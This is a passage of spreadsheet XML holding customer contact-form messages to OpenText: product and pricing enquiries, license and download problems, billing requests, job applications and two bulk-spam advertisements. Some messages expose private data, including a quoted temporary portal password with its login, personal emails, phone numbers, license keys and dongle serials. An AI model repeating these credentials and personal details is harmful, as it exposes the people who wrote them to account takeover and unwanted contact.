If you have any questions please do not hesitate to contact us. _x000D_
_x000D_
Thank you in advance. _x000D_
_x000D_
Yours sincerely,_x000D_
Michelle Salomon</t>
  </si>
  <si>
    <t>I would like to know if the application "OpenText Brava! Desktop" has a set of Custom APIs/libraries that can be used to invoke the functionality exposed from the application without use the application interface._x000D_
_x000D_
Thanks for the information._x000D_
Regards.</t>
  </si>
  <si>
    <t>Could you please let us know, we have the support contract, but My support is not activated for the email address Madhu.Pyapali@ska-lv.de._x000D_
I would like to download the latest OpenText Delivery and Web management server.</t>
  </si>
  <si>
    <t>Good morning, can you please tell me if we have a support contract? We have a customer that needs a certificate update and i believe that OpenText have to perform this task._x000D_
Many thanks, Jamie.</t>
  </si>
  <si>
    <t>Informationen über die Möglichkeit zur Implementierung einer Software, die eine automatisierte Prüfung von Verträgen ermöglichen kann.</t>
  </si>
  <si>
    <t>I need to create a ticket with opentext for the LDAP Job issue for Mango Application. I am a support team member for Merck manGo Application.</t>
  </si>
  <si>
    <t>We are bidding for one of large project in MA Health exchange and we are considering to use the opentext, we need pricing for the same.  It is urgent as proposal response is due in next 2-3 days. Please let me know how we can get the pricing of the CMS and the professional services rates asap.</t>
  </si>
  <si>
    <t xml:space="preserve">Confirming mail i did 3 times but when i want to download  the report builder 6.1  that we buyed from A+W software Germany we get the message no access </t>
  </si>
  <si>
    <t>We have a customer who is looking for the ECM solution. They would like to discuss the functionality of your product.</t>
  </si>
  <si>
    <t>BG</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I received a mail with credentials to login to view an e-invoice:_x000D_
_x000D_
Welcome to the E-invoicing portal. _x000D_
_x000D_
To access the portal and your Travel invoices, please use the following details: _x000D_
_x000D_
URL: the invoicing opentext URL - cannot include it here_x000D_
Login: dimiter.topalov@progress.com_x000D_
Profile: Traveller_x000D_
_x000D_
A temporary password will be sent to you in a separate e-mail. _x000D_
_x000D_
Here is the temporary password:_x000D_
_x000D_
Your temporary password to access the E-Invoicing portal and your Travel invoices is: _x000D_
_x000D_
6*wryXnk_x000D_
Profile: Traveller_x000D_
_x000D_
However when I logged to the portal, I was prompted to change my password with a randomly generated one that was not stored in my passwords (the one, listed above is stored instead)._x000D_
_x000D_
Now I cannot retrieve my password again as there are a set of security questions that I never had the chance to set._x000D_
_x000D_
Can you please send me another temporary password so I can reset it again. Thank you in advance.</t>
  </si>
  <si>
    <t>?</t>
  </si>
  <si>
    <t>Hello together,_x000D_
_x000D_
I have to activate our new Electronic License for Encase._x000D_
But i stopped at the point "Click Next. A second Activate Electronic License dialog displays._x000D_
_x000D_
    Return to your MyAccount email and click the Submit your file link._x000D_
    In the web page that displays, browse to the location of the License Request file, then click Submit."_x000D_
I don't find the "MyAccount eMail and the "Submit" Button!_x000D_
I received an email from a colleague with the "License Key - OTCS Ticket 4092284 Zertifikate" and a zip-file. But at the step i have written above i stopped. Could it be because of the License Key is created for my colleague under his account?_x000D_
Can you write me a short hint, how i can update our license for our two PC's_x000D_
_x000D_
Thank you in advance._x000D_
Best regards_x000D_
Marco Russi</t>
  </si>
  <si>
    <t>Looking to understand your solutions within the context of a briefing for a report on Analytics technology within Telecoms.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to have an offer to my company using opentext solution  for document management._x000D_
I would like to have a lot material to read about your solutions, so i am open to get a lot of pdfs._x000D_
Yours, Viktor Varga</t>
  </si>
  <si>
    <t>Hello,_x000D_
One of our clients provided us with X400 mailbox details, that is registered at OpenText._x000D_
_x000D_
We cannot directly exchange EDI via X400, so I would like to know if it's possible to set up AS2 connection with your company and forward messages to client's mailbox?_x000D_
_x000D_
Best regards,_x000D_
Bartosz Wojnarowicz</t>
  </si>
  <si>
    <t>We are migrating our old systems to latest version of windows platform and we have few old reports developed with Actuate 7 or 8. Now these reports also needs to be migrated to higher version or may need to port out to Jasper or BIRT. Kindly provide me with following information._x000D_
1. Can Actuate 7/8 reports be converted into latest version to run seamlessly in latest version of windows._x000D_
2. Do we need think on converting the reports to BIRT reports to achieve the same._x000D_
3. How convinient it is to convert actuate 7/8 reports to BIRT if point no 2 is valid_x000D_
4. Is BIRT a free software/tool that can be used or it has license cost associated with it._x000D_
5. If it has License cost associated with it then how much is the license cost_x000D_
6. Are Licenses are group licenses or per user licenses and _x000D_
7. what are duration of licenses to be valid.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, I applied for the role of Training Coordinator in Reading on the 10th March and I was just following up on my application to confirm if it had been put forward for consideration. Kind regards, Joanne. </t>
  </si>
  <si>
    <t>We have bought BI Query from Opentext. I have logged in to your internetpages. But where do I find the link for download of BI Query (Hummingbird developed this software)?</t>
  </si>
  <si>
    <t>I am interested in your EDI solutions for a small business.  Would it be possible to discuss over e-mail or phone?_x000D_
_x000D_
Thanks much,_x000D_
Zachary Tillman</t>
  </si>
  <si>
    <t>Hello, we have two licenses of EnCase v8 and would like to keep it up to date, but according to your redistributor in Russia, LAN Project, it's prohibited to sell it in Russia due to sanctions._x000D_
Does it correct? Can we sort it out as soon as possible?</t>
  </si>
  <si>
    <t>I am trying to locate a link to download the latest version of Encase Forensic for our analysis machines at the Australian Border Force.  The use of this product is licensed to us however I cant locate the old links or access passwords,  regards,  Daniel</t>
  </si>
  <si>
    <t xml:space="preserve">Need small clarification_x000D_
  From SharePoint 2016 Library to connect with file system and do all operations with out sql server_x000D_
is this possible from opentext?_x000D_
</t>
  </si>
  <si>
    <t>We are keen to purchase Tableau products and will like to find out the resellers in Singapore._x000D_
Thanks.</t>
  </si>
  <si>
    <t>Need to get support from Opentext , and maybe upgrade the version of Actuate 9.</t>
  </si>
  <si>
    <t>Urgent: we need renewal quotation for our FSI client in China. please contact me soon</t>
  </si>
  <si>
    <t>We have a project to implement an upgrade the Documentum V6.5 to V16.4. _x000D_
So, I would like to ask you to support the trial key of Captival for test the module to support the client.</t>
  </si>
  <si>
    <t>need your support Exceed V.15.0.5</t>
  </si>
  <si>
    <t>Who is it I don’t work for months due to a car accident the insurance hasn’t paid for yet I’ll pay for out of my own pocket to work and he  $800 soon or eviction will take place</t>
  </si>
  <si>
    <t>I cannot run the Exceed version 15 on Windows 10_x000D_
Please contact me ASAP.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I'm Hyehyun Lee from Fronteo korea._x000D_
I bought 5 Encase forensic license last month via Korea side distributor._x000D_
I'd like to renew those 5 licenses and upgrade to v.8, but I can't find download .exe file._x000D_
Could you please send us upgrade file? _x000D_
Now we use v.7 and v.6 in our office._x000D_
Also, is there any difficulties in progress renew, please let me know how to renew license._x000D_
_x000D_
thank you_x000D_
</t>
  </si>
  <si>
    <t>Please help me to activate electronic licence to retake Ence phase II</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Boss&amp;Hall сэкономит время изучения рынка элитной недвижимости и значительно упростит выбор подходящего объекта. _x000D_
Boss&amp;Hall — работаем над воплощением Вашей мечты _x000D_
Если у Вас есть ресурсы на воплощение мечты, все должно происходить легко и приятно. _x000D_
К сожалению, в нашем городе и стране даже на элитном рынке недвижимости всегда было трудно найти действительно качественный сервис. _x000D_
С пониманием этого момента мы основали компанию Boss&amp;Hall. Обратившись к нам, Вы нанимаете брокера, который без финансового участия с вашей стороны выполняет поставленные перед ним стандартные и нестандартные задачи, а также, а делает все, чтобы оправдать высокий кредит доверия, выданный таким человеком, как Вы. _x000D_
Мы в Boss&amp;Hall работаем с эксклюзивными клубными домами в центре Москвы. И прекрасно понимаем, что квартира Вашей мечты в этих домах только одна. Наши эксперты готовы перевернуть рынок вверх дном и провести конструктивные переговоры с каждым застройщиком, чтобы обеспечить результат, в соответствии с Вашими пожеланиями и запросами. _x000D_
Мы в Boss&amp;Hall умеем подбирать действительно эксклюзивные, роскошные квартиры и гордимся этим. </t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good man! There is a good offers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for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
Domain zone .de - (2 million messages sent) - $99 instead of $199 _x000D_
Domain zone .uk - (1.5 million messages sent) - $69 instead of $139 _x000D_
Domain zone .nl - (700 000 sent messages) - $39 instead of $79 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 25. _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
Sorry to bother you.</t>
  </si>
  <si>
    <t>What are your CMS offerings and how much do they cost?</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to reset password, keep a saying access denied after I update with new a password from link sent_x000D_
Cannot register for classes_x000D_
</t>
  </si>
  <si>
    <t>I NEED TO PAY MY BILL! PLEASE CONTACT US ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">HighTail does not work. I paid money for it and it does not do the fundamental thing it's supposed to do. Cannot link to file. Was fine until OpenText took over. I need this addressed immediately. Chat line, customer service all non-responsive. Outrageous! </t>
  </si>
  <si>
    <t>Blend is a white label provider of mortgage origination solutions. We work with 25% of US mortgage lenders to bring their origination experience online. In that process we collect a large number of PDF and JPEG documents from loan applicants. We are looking for solutions that can help us enhance that experience.</t>
  </si>
  <si>
    <t xml:space="preserve">At one time we had an account for fax2mail. I can't find an account number or info on our account. Could someone advise if we do still have an active account and if so, how do we manage who can use it, etc. </t>
  </si>
  <si>
    <t>I'd like to review my auto pay account info.</t>
  </si>
  <si>
    <t>Interested on integrating Recostar in my scanner application, we manufacture high speed scanners at buserdi heds</t>
  </si>
  <si>
    <t>I am trying to logon to find the How to Setup Office 365 with RightFax.  I received a link with the article and I am trying to access it now.</t>
  </si>
  <si>
    <t>how can i cancel accounts with you??</t>
  </si>
  <si>
    <t xml:space="preserve">Need clear information about OTCSSA (OpenText Content Server System Administrator Certification) Certification, Do I need to complete all the courses mentioned in the prerequisites? Or can I prepare my self and directly attend for the certification exam ? </t>
  </si>
  <si>
    <t>I want to pay my invoives.</t>
  </si>
  <si>
    <t>Good afternoon_x000D_
_x000D_
While attending last years Enfuse conference I recall picking up a form to fill out for CPE credits. I seem to have misplaced that form. Could you send me a copy to fill out for credits and the certificate?_x000D_
_x000D_
Thank you in advance_x000D_
_x000D_
Joshua Waite</t>
  </si>
  <si>
    <t>I am interested in the possibility of having access to an instance of an Open Text Media Manager in the cloud so that I can demonstrate it to my students in a Digital Asset Management class.  Is this possible?  Do you partner with other universities for this kind of thing.  Sadly, I am unlikely to be a "customer" since I am quite sure that I can't afford Open Text solutions.  However, at some point in the future it is possible that my students - somewhere in their future career - will remember some instruction on Open Text solutions and be predisposed to your software.</t>
  </si>
  <si>
    <t>is it possible to add email fields to all folders..  i.e. quick searches firm wide rather then have each individual add them?</t>
  </si>
  <si>
    <t>contatto prova</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Recently I've been trying to buy Tableau hardware for our team in our Paris office. I wanted to pass feedback that the 3 French distributors you have listed on your website are pretty terrible. One has not replied to a single email, one replied a month ago but hasn't replied since and one takes over a week to respond to my emails. I am now searching for a distributor from another country to make these purchases. Not cool! _x000D_
_x000D_
Kind regards,_x000D_
Josh_x000D_
</t>
  </si>
  <si>
    <t>U.S. Department of Housing and Urban Development sales contact to create a quote.</t>
  </si>
  <si>
    <t>Good day Team,_x000D_
_x000D_
   I’m currently working on a 2 day business meet titled “Plant Reliability &amp; Maintenance Excellence Summit” which is being held on 4th – 5th September 2019 | Monterrey, Mexico and would like to see if OpenText would be interested in presenting your brand, products &amp; services to over 70+ senior industry professionals representing leading energy companies, oil &amp; gas, automobile, industrial attending this event from the LatAm region._x000D_
_x000D_
Do let me know who I can take this up with. _x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Mukesh Kumar_x000D_
Business Development - Head</t>
  </si>
  <si>
    <t>I see you offer onsite training.  I am interested to know the cost involved in having a trainer come to New Zealand to run the EnCase prep exam and ideally run the exam for say 5 people. Thanks Jason</t>
  </si>
  <si>
    <t>Looking for Renewal Invoice</t>
  </si>
  <si>
    <t>My IT manager, Susanne Jerome has recently passed away. As the Systems Admin, I have some changes to our account that need to be made, but am not knowledgeable with the account management procedures, or have any management credentials._x000D_
_x000D_
Please advise._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Hope this finds you well._x000D_
_x000D_
We are interested in a demonstration of OpenText to determine if it covers our document and email management needs._x000D_
_x000D_
These, briefly, are:_x000D_
_x000D_
1. Automatic filing_x000D_
2.Advanced search capability_x000D_
3.Version management_x000D_
4.Access rights_x000D_
5. Cloud hosting_x000D_
_x000D_
Looking forward to your response._x000D_
_x000D_
Many thanks and best regards,_x000D_
Antonios Vyrgiotis</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting contact email address of a sales representative so we can send a formal RFQ per our process. Please note that this request is TIME SENSITIVE! Thanks. </t>
  </si>
  <si>
    <t>I have been tasked with installing Encase version 8.08, and I am unable to download.</t>
  </si>
  <si>
    <t>Need to know the IT infrastructure requirements/specifications (servers, etc.) when using Blazon.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are interested in acquiring a DAM solution to support our exponential growth in digital assets. As an initial step, we are doing a full business discovery and mapping exercise, documenting current and future workflows involving digital assets. In parallel, we would like to start engaging with several industry-leading DAM providers to start understanding the capabilities offered by their systems. Could you please send me a product information sheet for your DAM solutions (cloud-based) so we could have an initial look? _x000D_
_x000D_
Thank you, _x000D_
Michael.</t>
  </si>
  <si>
    <t>I have a new invoice from you guys that I need to set up payment for.  In order to do that, I need a copy of your W9.  Can someone please email that to me?_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am wondering if we can get the names of the offices on inbound faxes to appear so when the come in we don't have to search for them and open them one by one.  I have uploaded them into the contact but want them to pull into the inbound faxes instead of just outbound.  Is this possible. </t>
  </si>
  <si>
    <t>I am validating our vendor and the patch levels of applications we have in our portfolio.  _x000D_
_x000D_
Can you advise what the lastest version of patches you have on the Case 360 Product.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  I do not can download Encase Investigator Endpoint ?? Can you send me link download._x000D_
My Key :To activate your EnCase electronic license:_x000D_
(applies to key(s) - X100008116143 )_x000D_
_x000D_
_x000D_
Software Installers &amp; Related Files_x000D_
_x000D_
EnCase Endpoint Investigator 8.05 Installers_x000D_
EnCase Endpoint Investigator 8.05 Setup - English_x000D_
647 MB - C7EC012A462A4779E6602C1C1B06A6D2_x000D_
EnCase Endpoint Investigator 8.05 Setup (x64) - English_x000D_
732 MB - 1756C011715C46AF9A75066EFADD1EFE_x000D_
EnCase Processor Node 8.05 Setup (x64) - English_x000D_
1.45 GB - C751A7CfEAD8289F90704E16826DFE81_x000D_
Guidance SAFE a.05 - English_x000D_
676 MB - D9FFF1026C82E515711281670838AA9E_x000D_
NSRL Hash Library in the EnCase Format (Part 1)_x000D_
3.99 GB - B55ADDF900E88731AA63F5F9AFE9DB27_x000D_
NSRL Hash Library in the EnCase Format (Part 2)_x000D_
2.51 GB - 61B5EF01C77701BFCD03CBC93ABBA685_x000D_
EnCase Forensic Imager 7.10 - English_x000D_
21.1 MB - f943297aceefc03e340ff983611895fa_x000D_
EnCase Forensic Imager 7.10 (x64) - English_x000D_
24.7 MB - e2605a7398167ba1e8116a907034a5a9_x000D_
EnCase Mobile Driver Pack_x000D_
300 MB - F22C761896EAF13212138995CC777936_x000D_
Windows6.1 KB3033929-x86_x000D_
26.4 MB - 9C020D19F925056D526FA00DAB20EC5F5_x000D_
Windows6.1 KB3033929-x64_x000D_
43.7 MB - 87FF18974DE76144206910D0B41A8AE5_x000D_
Windows6.1 KB2921916-x86_x000D_
799 KB - 05A178D9E1E62FDC1475800674124DE9_x000D_
Windows6.1 KB2921916-x64_x000D_
1.18 MB - 270853EAB5976C28EB71DE2FFE8D7B52_x000D_
</t>
  </si>
  <si>
    <t>we have a client who needs to purchase your software for use on a jobsite.  please reach out, we would also like to know if we should become a partner or if you sell direct to clients</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je ne peux plus créer de ticket incident avec mon compte d'utilisateur, pouvez vous regarder pourquoi ? _x000D_
_x000D_
Cordialement,_x000D_
_x000D_
francois.patrier@bmw.fr</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
This is Yogesh. we require some corporate training to our employees regarding live link._x000D_
could you, please drop a mail to the above mail  about live link training. </t>
  </si>
  <si>
    <t xml:space="preserve">I have a gov't client of mine looking for me to price a renewal and I am hoping you can assist me with pricing?_x000D_
_x000D_
Item Description	U/M	Qty_x000D_
 MFR. OpenText_x000D_
P/N: 1000025395 (S-EXMPl550101M_M)_x000D_
 _x000D_
New POP: 6/1/19 TO 5/31/20_x000D_
_x000D_
DESCRIPTION  _x000D_
Exceed Single License (Electronic) Maintenance_x000D_
NEW POP 06/01/19 to 05/31/20_x000D_
Unique #: 56179-12400	EA	86_x000D_
</t>
  </si>
  <si>
    <t>Hi, I work in the Career Services department at Queen's University in Canada and I'm interested in automating our process of inputting data from student forms. What is  your pricing model? Do you charge a subscription fee or do you charge by each document you process? Thank you!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are a Standards Development Organization (SDO) accredited by ANSI to manage the standards development process for multiple American National Standards. We are looking for a software platform to help us manage the end-to-end process and one of our members mentioned that your company provides this type of software to ISO and BSI in Europe (LiveLink OpenText)._x000D_
_x000D_
At a high level, we need the following functionality:_x000D_
•	Roster management - ability to manage all the members of our committees and subcommittees which includes:_x000D_
o	Voting roles (Primary, Alternate)_x000D_
o	Interest categories_x000D_
o	Contact information_x000D_
•	Voting:_x000D_
o	Create ballots and collect votes from committee members_x000D_
o	Ability to create a recirculation ballot for an updated document _x000D_
o	Set open, close dates for ballots and send reminders_x000D_
o	Calculations of pass/fail based on specific percentages_x000D_
o	Comments management:_x000D_
	Ability for members to submit comments on a balloted document_x000D_
	Ability to respond to comments submitted_x000D_
•	Document management:_x000D_
o	Post and share documents with committee members_x000D_
o	Control access based on the role of individual members_x000D_
•	Folder management:_x000D_
o	Ability to create, move, delete folders for each committee_x000D_
Calendar:_x000D_
•	Set up Meetings/Events_x000D_
•	Track meeting attendance_x000D_
_x000D_
I would appreciate it if you could let me know if your platform supports this type of functionality._x000D_
_x000D_
Thanks,_x000D_
Ovidiu</t>
  </si>
  <si>
    <t>NaviLogic is a Security VAR.   I am new to NaviLogic and looking to determine our current partnership status.   I believe it is still active and would like to be connected to a channel account manager.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I have been round the houses with various suppliers as the Refining business a long time ago had a TIS /  BECK IT / OPENTEXT solution installed I spoke with Mathew Keighley of Opentext and he advised that I should raise a call with you_x000D_
Quick Summary TIS / BECK do the image scanning and workflow and a documentum server using SAP archive does the data storage and here lies the problem_x000D_
_x000D_
On ZR content repository  I now did a  resend of the Certificate but if I try to open a document from OAAD I also get the same authorization error._x000D_
 _x000D_
A Test Report for Content Server access also shows that the connection is OK and it retrieves some basis info on type, dates, version…. But access to the repository also gives the certificate error._x000D_
I think someone will need to verify on the Content Server if the REP certificates are still on the server (sending the certificate from REP doesn’t mean that it can be used as there  can be other restrictions/issues on the content server)._x000D_
 _x000D_
Is it possible to contact someone that manages this server to verify ?_x000D_
 _x000D_
 _x000D_
 the error message is (as I cannot send a screen shot) HTTP error: 401 Unauthorised invalid certificate: No active certificate for content repository:ZR_x000D_
Can you please help as we cannot access our archived invoices_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need assistance renewing my Encase Forensics Software contract for too licenses. Dongles_x000D_
V139703766U, V334349922U</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I would like to know if in Fax2Mail the information is stored in the partner or opentext premises and get a sample quote (including set up) ._x000D_
_x000D_
Thanks,_x000D_
Natalie</t>
  </si>
  <si>
    <t>We received repetitive emails from our suppliers containing information and files which we then load into a supply chain tracking system.  We are looking to automate this repetitive process.  Is this something that you can help with</t>
  </si>
  <si>
    <t>I am interested in taking the 3-0191 or 3-0192 virtual class for Content Server System Administration I v16.2. _x000D_
_x000D_
What hours are the courses taught? Are they both in English? What do I need at my end in order to be able to take the course?</t>
  </si>
  <si>
    <t>I need help regarding setting up a 3270 session.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I attended an Encase training course last week at your facility in Reading, UK. Whilst there I spoke to Carl, who was one of the trainers, and he informed me that I am able to purchase an Encase training passport upgrade. I have spoken to my supervisor at work and he has agreed in principle to authorise purchase of the upgrade, but he requires a written quote to take it forward. Please can you send me a quote via email so that I can forward it to him._x000D_
For your information, I have completed two Encase courses to date, namely 'Foundations of Digital Forensics' and 'Building an Investigation with Encase'. I am looking to upgrade to the full Encase 1 year forensic passport. Carl stated that it would cost in the region of £2,800._x000D_
Many thanks in advance_x000D_
Kind regards_x000D_
James</t>
  </si>
  <si>
    <t>Hello, I'm interesting in your product OpenText Documentum, can you please contact me with Sales Manager._x000D_
Thanks.</t>
  </si>
  <si>
    <t>I cannot access the last session when box pop up show but cannot type Username and password.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We have a project to establish forensic lab and we would like to use your EnCase software for that. _x000D_
How we can work together ? _x000D_
Best regards_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We already have an account number SG01-S10412758, and are in receipt of your invoice SG100003498 for SGD90.00._x000D_
We would like to make the payment by my Manhattan Credit Card as was done earlier._x000D_
Please give details of how we may make this payment</t>
  </si>
  <si>
    <t>Hello team,_x000D_
Hope you people can share a solution for my below noted case._x000D_
The successfully received fax from internal user does not display sender's fax number or remote ID  in recipient inbox in faxutil and webutil.But faxes from external network display very well.   _x000D_
Thank you</t>
  </si>
  <si>
    <t>We are unable to connect to the GXS catalog ItemWebService.  Can you please check to see if our batch ID was expired?  SAKSWS2</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am Bharat Shivannavar. Currently i am looking for a job related to Networking profile. I got an update from one of my friend about job opening in your company for 'NOC Engineer'. He also shared me one number, i spoke with them they told me to share my resume. But i don't have your mail ID. I called twice to get mail ID they told me to do not call on this number. So i request you to share me with your mail ID to process my job application.  _x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please Quote the following_x000D_
_x000D_
Opentext Encase Forensic V8 (Enterprise)_x000D_
With one year subscription_x000D_
1)      ENCASE CYBERSECURITY SOFTWARE ENABLING SWIFT AND LARGELY AUTOMATED INCIDENT RESPONSE CAPABILITIES BY ENABLING CYBER DEFENSE  OR EQUIVALENT_x000D_
2)      VALIDATE THREATS DETECTED BY PERIMETER SOLUTIONS_x000D_
3)      ASSESS SOURCE AND IMPACT OF THREAT_x000D_
4)      ACCELERATE SCOPE ASSESSMENT AND TIME TO RECOVERY_x000D_
5)      PRIORITIZE RESPONSE BASED ON SENSITIVE DATA PROFILE_x000D_
6)      FULLY UNDERSTAND THE RISK OF EACH THREAT_x000D_
7)      WEB-BASED REPORTING OFFERS A CONVENIENT WAY TO SWIFTLY REVIEW, ACT ON, AND PRESENT FINDINGS_x000D_
8)      FORENSIC-LEVEL BASELINING EXPOSES POTENTIALLY THREATENING UNKNOWN DATA, EVEN IF HIDDEN OR OBFUSCATED FROM THE OPERATING SYSTEM_x000D_
9)      COMPLETE VISIBILITY AND CONTROL OVER ENDPOINT DATA THROUGH DISK-AND MEMORY-LEVEL OPERATION_x000D_
10)   ABILITY TO COMBINE AND FINE-TUNE VARIOUS SEARCH CRITERIA, INCLUDING KEYWORD, HAS VALUE, REGULAR EXPRESSIONS, DATE RANGES, AND MORE_x000D_
</t>
  </si>
  <si>
    <t>I am willing to get certified in Gupta SQL services</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, we previously collaborated together on developing Intranet Solutions for one of our clients. We have a similar brief that would require OpenText's services. Do kindly contact my email so I can furnish you with more information, thanks! </t>
  </si>
  <si>
    <t>Good Morning Ms. Julie,_x000D_
_x000D_
This is Liliane Barcelon. I am currently a student at Southville International School Affiliated with Foreign Universities. I am currently doing a thesis on the impact of AI on modern businesses. I would like to ask if there is someone I could get in touch with at your Philippines office for an interview on your CRM systems here in the Philippines. _x000D_
_x000D_
Furthermore, for the sake of the study, would you mind pointing me towards organizations who are currently using the system as of now._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">We have been informed to contact Open Text Professional Services for setting up of Cluster environment for Open Text 16.2. We have a 3 months timeline to complete the project by June 2019 and need support with a quick response on how to engage OT professionals to support our project. </t>
  </si>
  <si>
    <t>Hi, I'm a new OpenText Japan employee started from yesterday and would like to have a login access to this homepage. Can you please grant it?</t>
  </si>
  <si>
    <t>Hi Opentext,_x000D_
I would like to access OpenText Knowledge Center for Release Notes, Configuration, Installation and Upgrade Guides._x000D_
Am I able to use that link? what is neccessary things need to be done to get access to that link._x000D_
Thanks</t>
  </si>
  <si>
    <t>Opentext requesting for Price and solution. Urgent!!!!</t>
  </si>
  <si>
    <t>Need to download Encase Forensic to my machine.  We have the licensed dongle.  I do not have access to My Support which allegedly I need to download the software.  Please advise.</t>
  </si>
  <si>
    <t>MT</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good day! Please note an interesting offer for you. I want to offer the possibility of sending your commercial offers or messages through feedback forms. The advantage of this method is that the messages sent through the feedback forms are included in the white list. This method increases the chance that your message will be read. The same way you received this message. _x000D_
Sending via Feedback Forms to any domain zones of the world. (more than 1000 domain zones.). _x000D_
The cost of sending 1 million messages for any domain zone of the world is $ 49 instead of $ 99. _x000D_
Domain zone .com - (12 million messages sent) - $399 instead of $699 _x000D_
All domain zones in Europe- (8 million messages sent) - $ 299 instead of $599 _x000D_
All sites in the world (25 million messages sent) - $499 instead of $999 _x000D_
Domain zone .de - (2 million messages sent) - $99 instead of $199 _x000D_
Domain zone .uk - (1.5 million messages sent) - $69 instead of $139 _x000D_
Domain zone .nl - (700 000 sent messages) - $39 instead of $79 _x000D_
 _x000D_
 _x000D_
Discounts are valid until March 25. _x000D_
 _x000D_
Contact us. _x000D_
Telegram - @FeedbackFormEU _x000D_
Skype – FeedbackForm2019 _x000D_
Email - FeedbackForm2019@gmail.com _x000D_
 _x000D_
Thanks for reading.</t>
  </si>
  <si>
    <t>Please contact me regarding adding our products to your UPC catalog.</t>
  </si>
  <si>
    <t>I am attempting to register to take the EnCE phase 1 certification test.  I have finished all of my on demand training and I wish to arrange for payment of this test.  Please be advised that this is my second attempt at this test, so I already have a user name (email address) that I used before to access this test.  I have already tried to take advantage of the Opentext 'reset password' option on your site, but I keep getting the error "Update Password Failed". I am seeking to take this test as soon as possible.  Please provide assistance so that I can register and pay for this test.  My pertinent data is as follows:_x000D_
_x000D_
Name:  Melvin Smith_x000D_
Email Address (user name): msmith1@fbi.gov_x000D_
Office Phone: 312-235-8145_x000D_
Cell Phone: 312-907-8682</t>
  </si>
  <si>
    <t>Need to ask a question regarding Exceed/Opentext/Hummingbirg._x000D_
We are using Exceed to bring up XPP from SDL and I am at a loss why we have to have support for Exceed now when we have been using Exceed since 2007 without any knowledge of us having to be in contact with you. We are upgrading from Windows7 to Windows10 and IT is asking us for the software to download to Windows10. We have it on Windows7 but they are telling us that they need the software to install on new computer. We are users and IT has no knowledge aof Opentext. Please help in trying to figure this out.</t>
  </si>
  <si>
    <t>Did you send out our renewal notice in the mail?</t>
  </si>
  <si>
    <t>Why are sometime the message I get at the end of tabbing through an interactive from in Empower would default to Yes, sometimes to No, and sometimes doesn't default at all?</t>
  </si>
  <si>
    <t>Need to understand how we can leverage existing system with Opentext</t>
  </si>
  <si>
    <t xml:space="preserve">We are troubleshooting Transmission Errors in our RightFax system. We consistently encounter 2 reoccurring status codes:_x000D_
Resulting status code (4/259; 0/0): Dial Er:no loop current_x000D_
and_x000D_
Resulting status code (4/3; 0/0): Line broken (no loop current)._x000D_
We are looking for technical assistance in resolving this issue. Thank you for your time._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are looking into leveraging OpenText DAM to solve some business needs here at Cisco Meraki. It's my understanding that other teams within Cisco are already using OpenText, so I'm curious if we could spin up another instance for Cisco Meraki and what that might look like. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Would appreciate someone calling me in regards to Opentext software we had purchased. </t>
  </si>
  <si>
    <t xml:space="preserve">We currently have x40 V7 EnCase® Forensic (+EDS) Codemeter Time Security Key dongles for client but would like to swap them for x1 Server side dongles but we are unsure if this will work in our network configuration. Would it be possible to get a server side dongles for testing? </t>
  </si>
  <si>
    <t>Training, request for information. Please have someone contact me in regards to training for the following product: EnCase Cybersecurity with Analytics SMS Software Maintenance</t>
  </si>
  <si>
    <t>I've asked repeatedly to cancel my account. I'm still being billed monthly. CANCEL THIS.</t>
  </si>
  <si>
    <t>_x000D_
I am an enthusiastic fresh graduate who is also certified SAP consultant. I am looking for a vacancy that suits me and I came across your company that looks perfect for me. Although, I am from Egypt, I am willing to relocate and I have great interest in travelling generally. Also I am willing to start as an intern or to work under probation for as long as you feel I am the best fit for you. Also please note that I have finished successfully an internship earlier in Germany during my studies. I am looking forward to hearing from you.</t>
  </si>
  <si>
    <t>I would like access to OpenText support and the ability to download EnScripts. Every time I try to login into OpenText, I am sent a confirmation email. When I click on the email it I receive a message stating I do not have the authority to access the pages. I am with the Vancouver WA police department and we have multiple licensed and up to date copies of EnCase.</t>
  </si>
  <si>
    <t>Hello - Which is the latest version of Eroom and where can I please get details on which Windows version and database version(sql server?) is compatible with it?_x000D_
_x000D_
